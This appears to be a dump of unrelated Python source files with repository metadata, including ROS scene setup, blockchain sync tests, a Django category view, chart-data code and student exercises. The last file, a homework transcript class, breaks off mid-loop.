    Adds one collision box per entry of ``IRLab_workspace``, logging whether
    each insertion succeeded.  Returns silently when ROS shuts down or the
    user interrupts the script.
    """
    try:
        rospy.loginfo("Creating Demo Planning Scene")
        planning_scene = ExtendedPlanningSceneInterface()
        # Without this short pause the scene occasionally missed some boxes.
        rospy.sleep(1)
        for box_spec in IRLab_workspace:
            rospy.loginfo("-- Creating object: {}..".format(box_spec['name']))
            added = planning_scene.add_box(**box_spec)
            rospy.loginfo("------ {}".format("success" if added else "FAILED!"))
        rospy.loginfo("Created Demo Planning Scene.")
    except (rospy.ROSInterruptException, KeyboardInterrupt):
        return
if __name__ == '__main__':
    # Register this script as a ROS node; anonymous=True appends a unique
    # suffix so several instances can coexist.
    rospy.init_node('simple_scene_creator',
                    anonymous=True)
    # MoveIt's C++ layer needs its own initialisation with the CLI arguments.
    moveit_commander.roscpp_initialize(sys.argv)
    main()
| [
"[email protected]"
] | |
c9905c4f0826bb701e09958514299e45c73b5843 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/173/usersdata/265/86697/submittedfiles/moedas.py | a742b7f67e4b1843dcb579ac41fef535ec50768c | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 300 | py | # -*- coding: utf-8 -*-
a = int(input('digite o valor de a: '))
b = int(input('digite o valor de b: '))
c = int(input('digite o valor de c: '))
for qa in range (0,c,1):
if (((c-(qa*a))%)b==0):
print(qa)
qb=(c-(qa*a))//b
print(qb)
break
else:
print('N') | [
"[email protected]"
] | |
e0e94e4d38d76f3390d1bccd9905611afc425cc0 | 692f9d0f891fa670c56d88b96312c8295fcf06b3 | /olivemain/tests/core/full_node/full_sync/test_full_sync.py | a5dba0bbfdcc896e275950cd9f6b04545b81cccc | [
"Apache-2.0"
] | permissive | aisuyi065/Olive-blockchain | 97302c1002eb140957fa57eb1932f683847b4d64 | a4f5d48597af90343279597a81fd6441f4de9223 | refs/heads/main | 2023-06-30T04:41:09.882393 | 2021-08-07T03:53:27 | 2021-08-07T03:53:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,659 | py | # flake8: noqa: F811, F401
import asyncio
import logging
import time
from typing import List
import pytest
from olive.full_node.weight_proof import _validate_sub_epoch_summaries
from olive.protocols import full_node_protocol
from olive.types.blockchain_format.sub_epoch_summary import SubEpochSummary
from olive.types.full_block import FullBlock
from olive.types.peer_info import PeerInfo
from olive.util.hash import std_hash
from olive.util.ints import uint16
from tests.core.fixtures import default_400_blocks, default_1000_blocks, default_10000_blocks, empty_blockchain
from tests.core.node_height import node_height_exactly, node_height_between
from tests.setup_nodes import bt, self_hostname, setup_n_nodes, setup_two_nodes, test_constants
from tests.time_out_assert import time_out_assert
@pytest.fixture(scope="session")
def event_loop():
loop = asyncio.get_event_loop()
yield loop
log = logging.getLogger(__name__)
class TestFullSync:
@pytest.fixture(scope="function")
async def two_nodes(self):
async for _ in setup_two_nodes(test_constants):
yield _
@pytest.fixture(scope="function")
async def three_nodes(self):
async for _ in setup_n_nodes(test_constants, 3):
yield _
@pytest.fixture(scope="function")
async def four_nodes(self):
async for _ in setup_n_nodes(test_constants, 4):
yield _
@pytest.fixture(scope="function")
async def five_nodes(self):
async for _ in setup_n_nodes(test_constants, 5):
yield _
    @pytest.mark.asyncio
    async def test_long_sync_from_zero(self, five_nodes, default_400_blocks):
        """Sync five nodes from scratch: first below the weight-proof window,
        then across it, then after a deep reorg that forces long sync again.
        """
        # Must be larger than "sync_block_behind_threshold" in the config
        num_blocks = len(default_400_blocks)
        blocks: List[FullBlock] = default_400_blocks
        full_node_1, full_node_2, full_node_3, full_node_4, full_node_5 = five_nodes
        server_1 = full_node_1.full_node.server
        server_2 = full_node_2.full_node.server
        server_3 = full_node_3.full_node.server
        server_4 = full_node_4.full_node.server
        server_5 = full_node_5.full_node.server

        # If this constant is changed, update the tests to use more blocks
        assert test_constants.WEIGHT_PROOF_RECENT_BLOCKS < 400

        # Syncs up less than recent blocks: node 1's chain stays inside the
        # weight-proof recent-blocks window.
        for block in blocks[: test_constants.WEIGHT_PROOF_RECENT_BLOCKS - 5]:
            await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
        await server_2.start_client(
            PeerInfo(self_hostname, uint16(server_1._port)), on_connect=full_node_2.full_node.on_connect
        )

        # The second node should eventually catch up to the first one
        await time_out_assert(
            150, node_height_exactly, True, full_node_2, test_constants.WEIGHT_PROOF_RECENT_BLOCKS - 5 - 1
        )
        # Extend node 1 past the recent-blocks boundary, then connect node 3
        # (syncing from zero) so its sync crosses that boundary.
        for block in blocks[
            test_constants.WEIGHT_PROOF_RECENT_BLOCKS - 5 : test_constants.WEIGHT_PROOF_RECENT_BLOCKS + 5
        ]:
            await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
        await server_3.start_client(
            PeerInfo(self_hostname, uint16(server_1._port)), on_connect=full_node_3.full_node.on_connect
        )
        timeout_seconds = 150

        # Node 3 and Node 2 sync up to node 1
        await time_out_assert(
            timeout_seconds, node_height_exactly, True, full_node_2, test_constants.WEIGHT_PROOF_RECENT_BLOCKS + 5 - 1
        )
        await time_out_assert(
            timeout_seconds, node_height_exactly, True, full_node_3, test_constants.WEIGHT_PROOF_RECENT_BLOCKS + 5 - 1
        )
        # Disconnect everyone from node 1, give it the rest of the chain,
        # then build a mesh of connections so nodes 2-4 must sync to the tip.
        cons = list(server_1.all_connections.values())[:]
        for con in cons:
            await con.close()
        for block in blocks[test_constants.WEIGHT_PROOF_RECENT_BLOCKS + 5 :]:
            await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
        await server_2.start_client(
            PeerInfo(self_hostname, uint16(server_1._port)), on_connect=full_node_2.full_node.on_connect
        )
        await server_3.start_client(
            PeerInfo(self_hostname, uint16(server_1._port)), on_connect=full_node_3.full_node.on_connect
        )
        await server_4.start_client(
            PeerInfo(self_hostname, uint16(server_1._port)), on_connect=full_node_4.full_node.on_connect
        )
        await server_3.start_client(
            PeerInfo(self_hostname, uint16(server_2._port)), on_connect=full_node_3.full_node.on_connect
        )
        await server_4.start_client(
            PeerInfo(self_hostname, uint16(server_3._port)), on_connect=full_node_4.full_node.on_connect
        )
        await server_4.start_client(
            PeerInfo(self_hostname, uint16(server_2._port)), on_connect=full_node_4.full_node.on_connect
        )

        # All four nodes are synced
        await time_out_assert(timeout_seconds, node_height_exactly, True, full_node_1, num_blocks - 1)
        await time_out_assert(timeout_seconds, node_height_exactly, True, full_node_2, num_blocks - 1)
        await time_out_assert(timeout_seconds, node_height_exactly, True, full_node_3, num_blocks - 1)
        await time_out_assert(timeout_seconds, node_height_exactly, True, full_node_4, num_blocks - 1)

        # Deep reorg, fall back from batch sync to long sync: node 5 builds a
        # longer fork branching at height 350 (350 + 60 blocks, peak height
        # 409); after connecting to node 1, both should end up at 409.
        blocks_node_5 = bt.get_consecutive_blocks(60, block_list_input=blocks[:350], seed=b"node5")
        for block in blocks_node_5:
            await full_node_5.full_node.respond_block(full_node_protocol.RespondBlock(block))
        await server_5.start_client(
            PeerInfo(self_hostname, uint16(server_1._port)), on_connect=full_node_5.full_node.on_connect
        )
        await time_out_assert(timeout_seconds, node_height_exactly, True, full_node_5, 409)
        await time_out_assert(timeout_seconds, node_height_exactly, True, full_node_1, 409)
    @pytest.mark.asyncio
    async def test_sync_from_fork_point_and_weight_proof(self, three_nodes, default_1000_blocks, default_400_blocks):
        """Sync a node that starts mid-chain and one that starts on a
        different chain, and exercise the proof-of-weight request/response
        protocol along the way.
        """
        start = time.time()  # NOTE(review): unused; leftover timing/debug code
        # Must be larger than "sync_block_behind_threshold" in the config
        num_blocks_initial = len(default_1000_blocks) - 50
        blocks_950 = default_1000_blocks[:num_blocks_initial]
        blocks_rest = default_1000_blocks[num_blocks_initial:]
        blocks_400 = default_400_blocks
        full_node_1, full_node_2, full_node_3 = three_nodes
        server_1 = full_node_1.full_node.server
        server_2 = full_node_2.full_node.server
        server_3 = full_node_3.full_node.server
        # Node 1 holds the first 950 blocks of the canonical chain.
        for block in blocks_950:
            await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
        # Node 2 syncs from halfway
        for i in range(int(len(default_1000_blocks) / 2)):
            await full_node_2.full_node.respond_block(full_node_protocol.RespondBlock(default_1000_blocks[i]))
        # Node 3 syncs from a different blockchain
        for block in blocks_400:
            await full_node_3.full_node.respond_block(full_node_protocol.RespondBlock(block))
        await server_2.start_client(PeerInfo(self_hostname, uint16(server_1._port)), full_node_2.full_node.on_connect)
        await server_3.start_client(PeerInfo(self_hostname, uint16(server_1._port)), full_node_3.full_node.on_connect)

        # Also test request proof of weight
        # Have the request header hash: a known tip hash must yield a weight
        # proof that validates.
        res = await full_node_1.request_proof_of_weight(
            full_node_protocol.RequestProofOfWeight(blocks_950[-1].height + 1, blocks_950[-1].header_hash)
        )
        assert res is not None
        validated, _, _ = await full_node_1.full_node.weight_proof_handler.validate_weight_proof(
            full_node_protocol.RespondProofOfWeight.from_bytes(res.data).wp
        )
        assert validated

        # Don't have the request header hash: an unknown hash must be refused.
        res = await full_node_1.request_proof_of_weight(
            full_node_protocol.RequestProofOfWeight(blocks_950[-1].height + 1, std_hash(b"12"))
        )
        assert res is None

        # The second node should eventually catch up to the first one, and have the
        # same tip at height num_blocks - 1
        await time_out_assert(180, node_height_exactly, True, full_node_2, num_blocks_initial - 1)
        await time_out_assert(180, node_height_exactly, True, full_node_3, num_blocks_initial - 1)

        def fn3_is_not_syncing():
            # True once node 3 has left sync mode.
            return not full_node_3.full_node.sync_store.get_sync_mode()

        await time_out_assert(180, fn3_is_not_syncing)
        # Cut node 1's connections, then feed node 3 the remaining 50 blocks
        # directly so it advances block-by-block to the 1000-block tip.
        cons = list(server_1.all_connections.values())[:]
        for con in cons:
            await con.close()
        for block in blocks_rest:
            await full_node_3.full_node.respond_block(full_node_protocol.RespondBlock(block))
            assert full_node_3.full_node.blockchain.get_peak().height >= block.height
        log.warning(f"FN3 height {full_node_3.full_node.blockchain.get_peak().height}")

        # TODO: fix this flaky test
        await time_out_assert(120, node_height_exactly, True, full_node_3, 999)
        # Reconnect all peers; nodes 1 and 2 should now sync to height 999 too.
        await server_2.start_client(PeerInfo(self_hostname, uint16(server_1._port)), full_node_2.full_node.on_connect)
        await server_3.start_client(PeerInfo(self_hostname, uint16(server_1._port)), full_node_3.full_node.on_connect)
        await server_3.start_client(PeerInfo(self_hostname, uint16(server_2._port)), full_node_3.full_node.on_connect)
        await time_out_assert(180, node_height_exactly, True, full_node_1, 999)
        await time_out_assert(180, node_height_exactly, True, full_node_2, 999)
@pytest.mark.asyncio
async def test_batch_sync(self, two_nodes):
# Must be below "sync_block_behind_threshold" in the config
num_blocks = 20
num_blocks_2 = 9
blocks = bt.get_consecutive_blocks(num_blocks)
blocks_2 = bt.get_consecutive_blocks(num_blocks_2, seed=b"123")
full_node_1, full_node_2, server_1, server_2 = two_nodes
# 12 blocks to node_1
for block in blocks:
await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# 9 different blocks to node_2
for block in blocks_2:
await full_node_2.full_node.respond_block(full_node_protocol.RespondBlock(block))
await server_2.start_client(
PeerInfo(self_hostname, uint16(server_1._port)),
on_connect=full_node_2.full_node.on_connect,
)
await time_out_assert(60, node_height_exactly, True, full_node_2, num_blocks - 1)
@pytest.mark.asyncio
async def test_backtrack_sync_1(self, two_nodes):
blocks = bt.get_consecutive_blocks(1, skip_slots=1)
blocks = bt.get_consecutive_blocks(1, blocks, skip_slots=0)
blocks = bt.get_consecutive_blocks(1, blocks, skip_slots=0)
full_node_1, full_node_2, server_1, server_2 = two_nodes
# 3 blocks to node_1 in different sub slots
for block in blocks:
await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
await server_2.start_client(
PeerInfo(self_hostname, uint16(server_1._port)),
on_connect=full_node_2.full_node.on_connect,
)
await time_out_assert(60, node_height_exactly, True, full_node_2, 2)
@pytest.mark.asyncio
async def test_backtrack_sync_2(self, two_nodes):
blocks = bt.get_consecutive_blocks(1, skip_slots=3)
blocks = bt.get_consecutive_blocks(8, blocks, skip_slots=0)
full_node_1, full_node_2, server_1, server_2 = two_nodes
# 3 blocks to node_1 in different sub slots
for block in blocks:
await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
await server_2.start_client(
PeerInfo(self_hostname, uint16(server_1._port)),
on_connect=full_node_2.full_node.on_connect,
)
await time_out_assert(60, node_height_exactly, True, full_node_2, 8)
@pytest.mark.asyncio
async def test_close_height_but_big_reorg(self, three_nodes):
blocks_a = bt.get_consecutive_blocks(50)
blocks_b = bt.get_consecutive_blocks(51, seed=b"B")
blocks_c = bt.get_consecutive_blocks(90, seed=b"C")
full_node_1, full_node_2, full_node_3 = three_nodes
server_1 = full_node_1.full_node.server
server_2 = full_node_2.full_node.server
server_3 = full_node_3.full_node.server
for block in blocks_a:
await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
for block in blocks_b:
await full_node_2.full_node.respond_block(full_node_protocol.RespondBlock(block))
for block in blocks_c:
await full_node_3.full_node.respond_block(full_node_protocol.RespondBlock(block))
await server_2.start_client(
PeerInfo(self_hostname, uint16(server_1._port)),
on_connect=full_node_2.full_node.on_connect,
)
await time_out_assert(60, node_height_exactly, True, full_node_1, 50)
await time_out_assert(60, node_height_exactly, True, full_node_2, 50)
await time_out_assert(60, node_height_exactly, True, full_node_3, 89)
await server_3.start_client(
PeerInfo(self_hostname, uint16(server_1._port)),
on_connect=full_node_3.full_node.on_connect,
)
await server_3.start_client(
PeerInfo(self_hostname, uint16(server_2._port)),
on_connect=full_node_3.full_node.on_connect,
)
await time_out_assert(60, node_height_exactly, True, full_node_1, 89)
await time_out_assert(60, node_height_exactly, True, full_node_2, 89)
await time_out_assert(60, node_height_exactly, True, full_node_3, 89)
@pytest.mark.asyncio
async def test_sync_bad_peak_while_synced(self, three_nodes, default_1000_blocks, default_10000_blocks):
# Must be larger than "sync_block_behind_threshold" in the config
num_blocks_initial = len(default_1000_blocks) - 250
blocks_750 = default_1000_blocks[:num_blocks_initial]
full_node_1, full_node_2, full_node_3 = three_nodes
server_1 = full_node_1.full_node.server
server_2 = full_node_2.full_node.server
server_3 = full_node_3.full_node.server
full_node_3.full_node.weight_proof_handler = None
for block in blocks_750:
await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Node 3 syncs from a different blockchain
for block in default_10000_blocks[:1100]:
await full_node_3.full_node.respond_block(full_node_protocol.RespondBlock(block))
await server_2.start_client(PeerInfo(self_hostname, uint16(server_1._port)), full_node_2.full_node.on_connect)
# The second node should eventually catch up to the first one, and have the
# same tip at height num_blocks - 1
await time_out_assert(180, node_height_exactly, True, full_node_2, num_blocks_initial - 1)
# set new heavy peak, fn3 cannot serve wp's
# node 2 should keep being synced and receive blocks
await server_3.start_client(PeerInfo(self_hostname, uint16(server_3._port)), full_node_3.full_node.on_connect)
# trigger long sync in full node 2
peak_block = default_10000_blocks[1050]
await server_2.start_client(PeerInfo(self_hostname, uint16(server_3._port)), full_node_2.full_node.on_connect)
con = server_2.all_connections[full_node_3.full_node.server.node_id]
peak = full_node_protocol.NewPeak(
peak_block.header_hash,
peak_block.height,
peak_block.weight,
peak_block.height,
peak_block.reward_chain_block.get_unfinished().get_hash(),
)
await full_node_2.full_node.new_peak(peak, con)
await asyncio.sleep(2)
assert not full_node_2.full_node.sync_store.get_sync_mode()
for block in default_1000_blocks[1000 - num_blocks_initial :]:
await full_node_2.full_node.respond_block(full_node_protocol.RespondBlock(block))
assert node_height_exactly(full_node_2, 999)
@pytest.mark.asyncio
async def test_block_ses_mismatch(self, two_nodes, default_1000_blocks):
full_node_1, full_node_2, server_1, server_2 = two_nodes
blocks = default_1000_blocks
for block in blocks[:501]:
await full_node_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
peak1 = full_node_1.full_node.blockchain.get_peak()
full_node_2.full_node.sync_store.set_long_sync(True)
await server_2.start_client(PeerInfo(self_hostname, uint16(server_1._port)), full_node_2.full_node.on_connect)
wp = await full_node_1.full_node.weight_proof_handler.get_proof_of_weight(peak1.header_hash)
summaries1, _ = _validate_sub_epoch_summaries(full_node_1.full_node.weight_proof_handler.constants, wp)
summaries2 = summaries1
s = summaries1[1]
# change summary so check would fail on 2 sub epoch
summaries2[1] = SubEpochSummary(
s.prev_subepoch_summary_hash,
s.reward_chain_hash,
s.num_blocks_overflow,
s.new_difficulty * 2,
s.new_sub_slot_iters * 2,
)
await full_node_2.full_node.sync_from_fork_point(0, 500, peak1.header_hash, summaries2)
log.info(f"full node height {full_node_2.full_node.blockchain.get_peak().height}")
assert node_height_between(full_node_2, 320, 400)
| [
"[email protected]"
] | |
ffbb923905cedb23748806a6e5a210f52377acc7 | c42672aeac984ab3f57d840710e145f4e918ba01 | /nasws/cnn/search_space/monodepth/analysis.py | 872b130085e3b8170a5f7d4627a9b3fd1c6b5248 | [
"MIT"
] | permissive | kcyu2014/nas-landmarkreg | 00212b6015d1fef3e7198bfa596fa69a898167c2 | a00c3619bf4042e446e1919087f0b09fe9fa3a65 | refs/heads/main | 2023-07-21T19:52:19.392719 | 2021-08-24T09:37:24 | 2021-08-24T09:37:24 | 350,368,390 | 10 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,434 | py | import os
import glob
from collections import defaultdict
from monodepth.utils.reporter import tensorboard_check_tags, tensorboard_load_summary, count_parameters_in_MB_search
from monodepth.utils.checkpointer import load_args
from monodepth.models import MidasNet, MidasNetSearch
from nni.nas.pytorch.fixed import FixedArchitecture
import torch
from monodepth.utils.checkpointer import load_json
from thop import profile
import numpy as np
def sort_tb_pairs(l, ignore_index=True):
slist = list(sorted(l, key=lambda x: x[0]))
if ignore_index:
return list(zip(*slist))[1]
else:
return slist
def average_last_K(l, top_K=5):
return sum(l[-top_K:]) / top_K
def collect_experiment_kdt_from_tensorboard(path):
args = load_args(path + '/args.json')
# print(args)
# store all the results as follow
tb_paths = glob.glob(path + '/log/*')
res = defaultdict()
for p in tb_paths:
# print(p)
tags = tensorboard_check_tags(p)
for t in tags:
steps, r = tensorboard_load_summary(p, t)
if t in res:
res[t] += list(zip(steps, r))
else:
res[t] = list(zip(steps, r))
tag_specified = [
'validation/sparse_kdt_0.0001',
'validation/sparse_spr_0.0001']
final_res = {}
for tag in tag_specified:
d = sort_tb_pairs(res[tag])
final_res[tag] = average_last_K(d)
return final_res
def collect_experiment_result(path):
# the final evaluation model should be recomputed based on the results over server
# load args
args = load_args(path + '/args.json')
# print(args)
# store all the results as follow
tb_paths = glob.glob(path + '/log/*')
res = defaultdict()
for p in tb_paths:
# print(p)
tags = tensorboard_check_tags(p)
for t in tags:
steps, r = tensorboard_load_summary(p, t)
if t in res:
res[t] += list(zip(steps, r))
else:
res[t] = list(zip(steps, r))
# print(res.keys())
# collect the associated statistics
num_epoch = len(res['train/sum'])
num_channels = 256 # fixed across the entire dataset
num_cells = 4
seed = 0
# store all the intermediate results of 1 run.
all_train_loss = sort_tb_pairs(res['train/sum'])
all_valid_loss = sort_tb_pairs(res['validation/ReDWeb'])
train_loss = average_last_K(sort_tb_pairs(res['train/sum']))
valid_loss = average_last_K(sort_tb_pairs(res['validation/ReDWeb']))
# from the current log, this is at is. we do not have more to analyze
# From this point, we need to get the result from checkpoint and store all the statistics accordingly
# use this to directly apply
arch = load_json(path + '/arch.json')
print('processing architecture ',arch)
model = MidasNetSearch(backbone='resnext101_wsl', args=args)
mutator = FixedArchitecture(model, arch)
mutator.reset()
ckpt_path = path + '/checkpoint.pt'
if os.path.exists(ckpt_path):
print('loading checkpoint...')
checkpoint = torch.load(ckpt_path)
model.load_state_dict(checkpoint['model'])
print('finish loading the model ...')
# count parameters
num_param = count_parameters_in_MB_search(model, arch)
return num_epoch, train_loss, valid_loss, num_param, arch, all_train_loss, all_valid_loss
| [
"[email protected]"
] | |
00868bf5c2508b4f24084132b710bd214998c056 | 524acbbc16eac0ef28da58ff9f79d02d7cadcf1b | /backend/shop_time/categories/views.py | be8c7d554b3cbf84338a20c5cf0a4fe64763644b | [] | no_license | ZandTree/art-shop | 47eb6ed6f328157c852cef6e324e4be5ab3592f8 | faa506fb62f845168b9874a720c0b62808245058 | refs/heads/master | 2023-06-01T06:40:28.755068 | 2021-06-18T23:53:57 | 2021-06-18T23:53:57 | 376,624,201 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,802 | py | from rest_framework.views import APIView
from .models import Category
from .serializer import CategorySerializer
from rest_framework.permissions import AllowAny
from rest_framework import status
from rest_framework.response import Response
class CategoryList(APIView):
""" get all categories with tree structure"""
permission_classes = (AllowAny,)
def get(self,request,format=None):
"""
loop only for cat and sub_cat == 1 level inclusiveness;
need more: make loop deeper
"""
if Category.objects.all().exists():
categories = Category.objects.all()
result = []
for cat in categories:
if not cat.parent:
item = {}
item['id'] = cat.id
item['name'] = cat.name
item['slug'] = cat.slug
item['sub_categories'] = []
for category in categories:
sub_item = {}
if category.parent and category.parent.id == cat.id:
sub_item['id'] = category.id
sub_item['name'] = category.name
sub_item['sub_categories'] = []
item['sub_categories'].append(sub_item)
result.append(item)
return Response({'categories':result},status=status.HTTP_200_OK)
else:
# instead of 404 ( server error)
return Response({'errors':'No categories found'},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# def get_queryset(self, queryset=None):
#qs = Category.objects.all()
# TODO
# return queryset
# return queryset.get_cached_trees | [
"[email protected]"
] | |
d116cf499ae6b5ea0e40f3a62ee8e3bcd94e6a5e | 824f19d20cdfa26c607db1ff3cdc91f69509e590 | /random/strings/345. Reverse Vowels of a String.py | 88e11095e0c062114eea3783f47a5500cedfc1f9 | [] | no_license | almamuncsit/LeetCode | 01d7e32300eebf92ab54c983de6e183242b3c985 | 17aa340649574c37067ec170ceea8d9326be2d6a | refs/heads/master | 2021-07-07T09:48:18.069020 | 2021-03-28T11:26:47 | 2021-03-28T11:26:47 | 230,956,634 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | class Solution:
def reverseVowels(self, s: str) -> str:
s_list = list(s)
vowels = set({'a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U'})
left = 0
right = len(s_list)-1
while right > left:
if s_list[left] in vowels and s_list[right] in vowels:
s_list[left], s_list[right] = s_list[right], s_list[left]
left += 1
right -= 1
else:
if s_list[left] not in vowels:
left += 1
if s_list[right] not in vowels:
right -= 1
return ''.join(s_list)
sol = Solution()
print(sol.reverseVowels("leetcode"))
| [
"[email protected]"
] | |
68dccaff016d11cce153e1b9db7affab3c07bd9b | 01ea95d7301b9ad3b84f11c8cbcfe02d00017250 | /bin/until/echarts/Line.py | 74f27f3640b6945c26b0de1fc9a04cfdff387304 | [] | no_license | windyStreet/MQSTATIC | 82962ae7a43d015dac61cb6ffce8d8853e6774df | b5a3d3862bd824b4a08b1c29436e417a9590dcab | refs/heads/master | 2020-12-02T21:13:37.952192 | 2017-07-20T10:20:14 | 2017-07-20T10:20:14 | 96,275,208 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,518 | py | #!/usr/bin/env python
# !-*- coding:utf-8 -*-
import datetime
from bin.until import Logger
from bin.until import Time
from bin.until import Mongo
from bin.until import DBCODE
from bin.until import Filter
from bin.logic import BO
from bin.until import Data
L = Logger.getInstance()
class Line(object):
# search_filter_infos = None, _step = 60, _step_count = 7, _title_text = "数据统计", _type = "line"
def __init__(self, _search_filter_infos, _title_text, _type, _step=60, _step_count=7):
self._search_filter_infos = _search_filter_infos
self._step_count = _step_count
self._step = _step
self._title_text = _title_text
self._type = _type
self.start_time = None
self.end_time = None
def getFileter(self):
pass
def getLineChartData(self):
series = []
_legend_datas = []
for key in self._search_filter_infos:
_legend_data = key
_legend_datas.append(_legend_data)
_search_filter_info = self._search_filter_infos[key]
_project = _search_filter_info['project_name']
self_collection = _search_filter_info['self_collection']
_filter_infos = _search_filter_info['filter_infos']
_statistic_type = _search_filter_info['statistic_type']
_statistic_name = _search_filter_info['statistic_name']
self.start_time = Time.getStartTime(step=self._step, step_count=self._step_count) # 获取起始时间
is_search_db = False
for _filter_info in _filter_infos:
key = _filter_info['key']
relation = _filter_info['relation']
value = _filter_info['value']
if key == 'time' and (relation == DBCODE.GT or relation == DBCODE.GTE):
self.start_time = value # 过滤条件中的起始时间
elif key == 'time' and (relation == DBCODE.LTE or relation == DBCODE.LT):
self.end_time = value # 过滤条件中的终止时间
else:
is_search_db = True
times = Time.getComputeTimes(start_time=self.start_time, end_time=self.end_time, step=self._step)
series_data = [] # y轴上的信息
if is_search_db is True: # 多条件查询
_self_filter = Filter.getInstance()
_self_filter.filter("project", _project, DBCODE.EQ)
_self_filter.filter("type", _statistic_type, DBCODE.EQ)
for _filter_info in _filter_infos:
if _filter_info['key'] != 'time':
_self_filter.filter(_filter_info['key'], _filter_info['value'], _filter_info['relation'])
for i in range(len(times) - 1):
_self_filter.filter("createtime", times[i], DBCODE.GT)
_self_filter.filter("createtime", times[i + 1], DBCODE.LTE)
_filter = _self_filter.filter_json()
count = self_collection.find(_filter).count()
series_data.append(count)
else:
# 计划分批次查询
res_collection = Mongo.getInstance(table=BO.BASE_statistic_res).getCollection()
res_filter = Filter.getInstance()
res_filter.filter("statistical_time", times[0], DBCODE.GT)
res_filter.filter("statistical_time", times[-1], DBCODE.LTE)
res_filter.filter("statistical_step", self._step, DBCODE.EQ)
res_filter.filter("statistical_type", _statistic_type, DBCODE.EQ)
res_filter.filter("statistical_project", _project, DBCODE.EQ)
if Data.isNone(_statistic_name):
_statistic_name = None
res_filter.filter("statistical_name", _statistic_name, DBCODE.EQ)
print(res_filter.filter_json())
ress = res_collection.find(res_filter.filter_json()).sort("statistical_time", -1) # 计算前半部分值
self._step_count = len(times) - 1
series_data = Data.getD4tArr(len=self._step_count, default_value=0) # 坐标轴上的值
# 先来尝试组合数据,发现数据无法组合完整时,补充数据
i = 0
for res in ress:
if i == 0 and ress.count() != (len(times) - 1) and res['statistical_time'] != times[-1]:
# 重新补录一个值
_self_filter = Filter.getInstance()
if not Data.isNone(_statistic_name):
_self_filter.filter("name", _statistic_name, DBCODE.EQ)
_self_filter.filter("project", _project, DBCODE.EQ)
_self_filter.filter("type", _statistic_type, DBCODE.EQ)
_self_filter.filter("createtime", times[-2], DBCODE.GT)
_self_filter.filter("createtime", times[-1], DBCODE.LTE)
_filter = _self_filter.filter_json()
count = self_collection.find(_filter).count()
series_data[i] = count
series_data[i + 1] = res['statistical_count']
i = i + 2
else:
series_data[i] = res['statistical_count']
i = i + 1
series_data.reverse()
xAxis_data = times[1:] # 横坐标轴信息[] 时间信息 去掉首要点
serie = {
"name": _legend_data,
"type": self._type,
"showSymbol":False,
"smooth":True,
# "stack": '总量',
"data": series_data.copy() # 坐标轴上的值
}
series.append(serie)
_result = {
"title": {
"text": self._title_text
},
"legend": {
"data": _legend_datas.copy()
},
"xAxis": {
"data": xAxis_data.copy()
},
"series": series
}
return _result
def getInsatnce(search_filter_infos=None, _title_text="数据统计", _type="line", _step=60, _step_count=7):
if search_filter_infos is None:
L.warn("init Line , not search_filter_infos par")
return None
return Line(search_filter_infos, _title_text, _type, _step, _step_count)
| [
"[email protected]"
] | |
4442f06af05e88ccdffcc17cb294b3645525b836 | 29d1b8d1e01cda9c963b68074a4de18a67ef8c00 | /home_work_12 (2).py | 99d9ac6838eaff5c464b28f3ff3759fcacf019b8 | [
"MIT"
] | permissive | acc-cosc-1336/cosc-1336-fall-2017-stevepaul135 | fd515d3c7fdb75f408a045f4329efd6dfb783323 | 691cafe85cabd8f5829323fec77676d96c9225d4 | refs/heads/master | 2021-08-28T03:09:16.436604 | 2017-12-11T04:58:15 | 2017-12-11T04:58:15 | 103,597,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,082 | py | #Stephen Paul's 12th homework assignment
class Person:
def __init__(self, first_name, last_name):
self.name = first_name + ' ' + last_name
def displayPerson(self):
print("This persons name is", self.name)
class Student(Person):
def __init__(self, student_id, first_name, last_name, enroll_date):
self.student_id = student_id
self.__enrollDate = enroll_date
Person.__init__(self, first_name, last_name)
def displayStudentInfo(self):
print(self.student_id, self.name, self.__enrollDate)
class Professor(Person):
def __init__(self, professor_id, first_name, last_name, hire_date):
self.hire = hire_date
self.professor_id = professor_id
Person.__init__(self, first_name, last_name)
def displayProfessoInfo(self):
print(self.professor_id, self.name, self.hire)
class Course:
def __init__(self, course_id, title, credit_hours, professor):
self.course_id = course_id
self.title = title
self.hours = credit_hours
self.professor = professor #Should be a professor object
def displayCourseInfo(self):
print(self.course_id, self.title, self.hours, self.professor.name)
class Enrollment:
def __init__(self, enrollment_id, student, course, grade):
self.enrollment_id = enrollment_id
self.course = course #should be a course object
self.student = student #should be a student object
self.grade = grade
def displayEnrollment(self):
print(format(self.enrollment_id, '3')," ", format(self.course.title, '17'), format(self.course.hours,'12'), ' ', format(self.student.name,'24'), format(self.grade, '10'))
def changeGrade(self,new_grade):
self.grade = new_grade
class Transcript:
def __init__(self, student):
self.student_enrollments = {}
self.student = student #Should be a student object
def addEnrollments(self, enrollment): #enrollment should be an enrollment object
self.student_enrollments[enrollment.enrollment_id] = enrollment
def displayTranscript(self):
print("Name ", self.student.name)
print("Class ", "Credit Hours", "Credit Points", "Grade Points", "Grade")
creditpoint = ' '
gradepoint = ' '
Total_Credit_hours = 0
Total_Grade_Point = 0
for entry in self.student_enrollments:
